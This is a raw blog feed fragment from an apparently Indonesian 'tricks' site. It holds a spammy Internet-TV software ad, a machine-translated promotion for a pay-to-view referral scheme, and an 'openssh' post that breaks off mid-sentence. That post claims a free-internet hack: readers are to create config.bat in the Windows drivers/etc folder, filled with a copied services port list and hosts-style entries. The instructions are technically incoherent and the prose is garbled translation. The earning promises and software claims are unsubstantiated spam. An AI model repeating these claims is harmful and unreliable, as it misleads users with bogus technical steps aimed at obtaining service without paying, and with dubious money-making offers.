href='http://1000trik.blogspot.com/2011/01/camera-internet.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/3147769054068911773'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/3147769054068911773'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/camera-internet.html' title='camera internet'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-2067748833811690096</id><published>2011-01-09T03:07:00.000-08:00</published><updated>2011-01-09T03:08:20.634-08:00</updated><title type='text'>Watch on TV stream online</title><content type='html'>&lt;p&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/9f1fa86c.html"&gt;&lt;img&lt;br /&gt;src="http://www.BigExtraCash.com/images/tv-7.jpeg"&lt;br /&gt;hspace="8" vspace="6" border="0" align="left"&lt;br /&gt;title="Watch TV - Online Internet television" alt="Watch television - Live Internet TV"&gt;&lt;/a&gt;Watch&lt;br /&gt;&lt;strong&gt;4000 Online television channels&lt;/strong&gt; from your notebook.&lt;br /&gt;Not required of a TV tuner or decoder. Pure picture - no subscription needed.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Watch television shows live from home. All you need is&lt;br /&gt;&lt;a href="http://www.BigExtraCash.com/aft/09fe7612/9f1fa86c.html" title="Live Internet TV"&gt;our Internet TV software&lt;/a&gt;,&lt;br /&gt;your PC, and online connection.&lt;/p&gt;&lt;p&gt;live television is simply being able to watch a webcast in real time from anywhere across the world.&lt;br /&gt;Many of us discovered online Internet TV during this past presidential campaign when we were, as a nation, practically&lt;br /&gt;glued to some form of media in order to keep updated on the progress of the election. Some of us were acquainted to live Ip&lt;br /&gt;TV because we found it was an perfect way not only to keep updated with the news, but also weather, and sport events.&lt;/p&gt;&lt;p&gt;Why purchase regular TV for big money when you can install television&lt;br /&gt;on your computer? Internet television is the next big leap in online technology.&lt;br /&gt;Simply thing, Online TV offers a customer a way&lt;br /&gt;to watch his or her most viewed programs and films without pressing&lt;br /&gt;on the television remote control.&lt;/p&gt;&lt;p&gt;One of the most convenient things about live internet TV is that since you are watching it on your&lt;br /&gt;computer when a commercial comes around instead of having to sit through it you can just surf the web, which gets rid of the pain of commercials.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-2067748833811690096?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/2067748833811690096/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/01/watch-on-tv-stream-online.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/2067748833811690096'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/2067748833811690096'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/watch-on-tv-stream-online.html' title='Watch on TV stream online'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-7803410884639785930</id><published>2011-01-02T21:24:00.000-08:00</published><updated>2011-01-02T21:36:58.810-08:00</updated><title type='text'>money a month to 50 dollars to 500 dollars</title><content type='html'>&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;what&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;want to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;get&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;website&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;there are&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a lot of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;these&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;programs&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;but&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;makes&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;me&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;proud&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;one&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;program that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;guarantee&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to get&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dollar&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;one of them&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ProfiAdvert&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is easy enough&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;adjust&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the script&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that is given&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;by&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ProfiAdvert&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;alone&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;....&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;enaknya&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the program&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;pay&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;see&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;us in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;our blogs&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;so&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;traffic&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;can be&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;high&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;during a visit&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;with&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;lots&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;pengunjungi&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that goes into&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;our blog&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;, it appears&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;click&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;and&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;without&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;doing&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;anything else&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Your&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;job&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;promotion&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;and&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blog updates&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;only&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;able&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to get&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dollars&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to 1000&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dollars&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;is&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;because this type of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;payment&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;using&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;non&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;-dollar&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ponsterling&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;kedollar&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;be&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a little heavy&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;prepare&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps atn"&gt;high-&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;traffic&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blogs&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;have&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;list&lt;/span&gt; &lt;a href="http://profiadvert.com/?r=3433"&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;in one&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;month&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;you are&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;able to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;pay out&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;$ 500&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dollars&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is not&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;bad&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;for you&lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;program&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;this one&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;really&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;-&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;really&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;promising&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;not&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;spam&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;can be&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;paid&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;anywhere&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;the payout&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is also&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;easy&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to use&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;paypal&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;so&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;much&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;lighter&lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-7803410884639785930?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/7803410884639785930/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/01/money-month-to-50-dollars-to-500.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/7803410884639785930'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/7803410884639785930'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/money-month-to-50-dollars-to-500.html' title='money a month to 50 dollars to 500 dollars'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-9023247489831024336</id><published>2010-12-29T03:18:00.000-08:00</published><updated>2010-12-29T03:49:23.225-08:00</updated><title type='text'>openssh</title><content type='html'>&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;openssh&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;very&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;cool to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;play&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;with&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;once&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;it seems&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;windows&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;xp&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;had&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;me&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;try it yourself&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;apparently&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;managed&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;connect via&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;openssh&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;without&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;any&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;influence&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;here&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;I&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;explain&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;how to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;do&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;was so&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;cool&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;openssh&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;so that it can&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;free  Internet&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;via&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;modem&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;heeeeee&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;....,&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;want to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;try to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;do&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the trick&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ssh&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;let&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;us&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;learn&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;together&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;with&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ssh&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;emang&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;hell&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;...&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;weakness&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ssh&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;effect&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;computer&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;laptop.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;shell&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ya&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;like&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;this&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;br /&gt;&lt;br /&gt;in C:/windows/system32/drivers/etc/.... create file config.bat&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span id="result_box" class="short_text" lang="en"&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;which&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;contains:&lt;br /&gt;&lt;br /&gt;# Copyright (c) 1993-1999 Microsoft Corp.&lt;br /&gt;#&lt;br /&gt;# This file contains port numbers for well-known services defined by IANA&lt;br /&gt;#&lt;br /&gt;# subsystem                                sftp                     /usr/local/sbin/sftpd&lt;br /&gt;#&lt;br /&gt;# Format:&lt;br /&gt;#&lt;br /&gt;# &lt;service name&gt;  &lt;port number&gt;/&lt;protocol&gt;  [aliases...]   [#&lt;comment&gt;]&lt;br /&gt;#&lt;br /&gt;&lt;br /&gt;echo                7/tcp&lt;br /&gt;echo                7/udp&lt;br /&gt;discard             9/tcp    sink null&lt;br /&gt;discard             9/udp    sink null&lt;br /&gt;systat             11/tcp    users                  #Active users&lt;br /&gt;systat             11/tcp    users                  #Active users&lt;br /&gt;daytime            13/tcp&lt;br /&gt;daytime            13/udp&lt;br /&gt;qotd               17/tcp    quote                  #Quote of the day&lt;br /&gt;qotd               17/udp    quote                  #Quote of the day&lt;br /&gt;chargen            19/tcp    ttytst source          #Character generator&lt;br /&gt;chargen            19/udp    ttytst source          #Character generator&lt;br /&gt;ftp-data           20/tcp                           #FTP, data&lt;br /&gt;ftp                21/tcp                           #FTP. control&lt;br /&gt;telnet             23/tcp&lt;br /&gt;smtp               25/tcp    mail                   #Simple Mail Transfer Protocol&lt;br /&gt;time               37/tcp    timserver&lt;br /&gt;time               37/udp    timserver&lt;br /&gt;rlp                39/udp    resource               #Resource Location Protocol&lt;br /&gt;nameserver         42/tcp    name                   #Host Name Server&lt;br /&gt;nameserver         42/udp    name                   #Host Name Server&lt;br /&gt;nicname            43/tcp    whois&lt;br /&gt;domain             53/tcp                           #Domain Name Server&lt;br /&gt;domain             53/udp                           #Domain Name Server&lt;br /&gt;bootps             67/udp    dhcps                  #Bootstrap Protocol Server&lt;br /&gt;bootpc             68/udp    dhcpc                  #Bootstrap Protocol Client&lt;br /&gt;tftp               69/udp                           #Trivial File Transfer&lt;br /&gt;gopher             70/tcp&lt;br /&gt;finger             79/tcp&lt;br /&gt;http               80/tcp    www www-http           #World Wide Web&lt;br /&gt;kerberos           88/tcp    krb5 kerberos-sec      #Kerberos&lt;br /&gt;kerberos           88/udp    krb5 kerberos-sec      #Kerberos&lt;br /&gt;hostname          101/tcp    hostnames              #NIC Host Name Server&lt;br /&gt;iso-tsap          102/tcp                           #ISO-TSAP Class 0&lt;br /&gt;rtelnet           107/tcp                           #Remote Telnet Service&lt;br /&gt;pop2              109/tcp    postoffice             #Post Office Protocol - Version 2&lt;br /&gt;pop3              110/tcp                           #Post Office Protocol - Version 3&lt;br /&gt;sunrpc            111/tcp    rpcbind portmap        #SUN Remote Procedure Call&lt;br /&gt;sunrpc            111/udp    rpcbind portmap        #SUN Remote Procedure Call&lt;br /&gt;auth              113/tcp    ident tap              #Identification Protocol&lt;br /&gt;uucp-path         117/tcp&lt;br /&gt;nntp              119/tcp    usenet                 #Network News Transfer Protocol&lt;br /&gt;ntp               123/udp                           #Network Time Protocol&lt;br /&gt;epmap             135/tcp    loc-srv                #DCE endpoint resolution&lt;br /&gt;epmap             135/udp    loc-srv                #DCE endpoint resolution&lt;br /&gt;netbios-ns        137/tcp    nbname                 #NETBIOS Name Service&lt;br /&gt;netbios-ns        137/udp    nbname                 #NETBIOS Name Service&lt;br /&gt;netbios-dgm       138/udp    nbdatagram             #NETBIOS Datagram Service&lt;br /&gt;netbios-ssn       139/tcp    nbsession              #NETBIOS Session Service&lt;br /&gt;imap              143/tcp    imap4                  #Internet Message Access Protocol&lt;br /&gt;pcmail-srv        158/tcp                           #PCMail Server&lt;br /&gt;snmp              161/udp                           #SNMP&lt;br /&gt;snmptrap          162/udp    snmp-trap              #SNMP trap&lt;br /&gt;print-srv         170/tcp                           #Network PostScript&lt;br /&gt;bgp               179/tcp                           #Border Gateway Protocol&lt;br /&gt;irc               194/tcp                           #Internet Relay Chat Protocol       &lt;br /&gt;ipx               213/udp                           #IPX over IP&lt;br /&gt;ldap              389/tcp                           #Lightweight Directory Access Protocol&lt;br /&gt;&lt;br /&gt;and save, set config &lt;/span&gt;&lt;/span&gt;&lt;span id="result_box" class="short_text" lang="en"&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;using the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;protocol&lt;br /&gt;&lt;br /&gt;127.0.0.1 localhost&lt;br /&gt;situs taget (example : 1000trik.blogspot.com) or ip address&lt;br /&gt;28.10.10.10 server&lt;br /&gt;::2 server protocol&lt;br /&gt;::1 localhost&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;nah&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;alone&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk  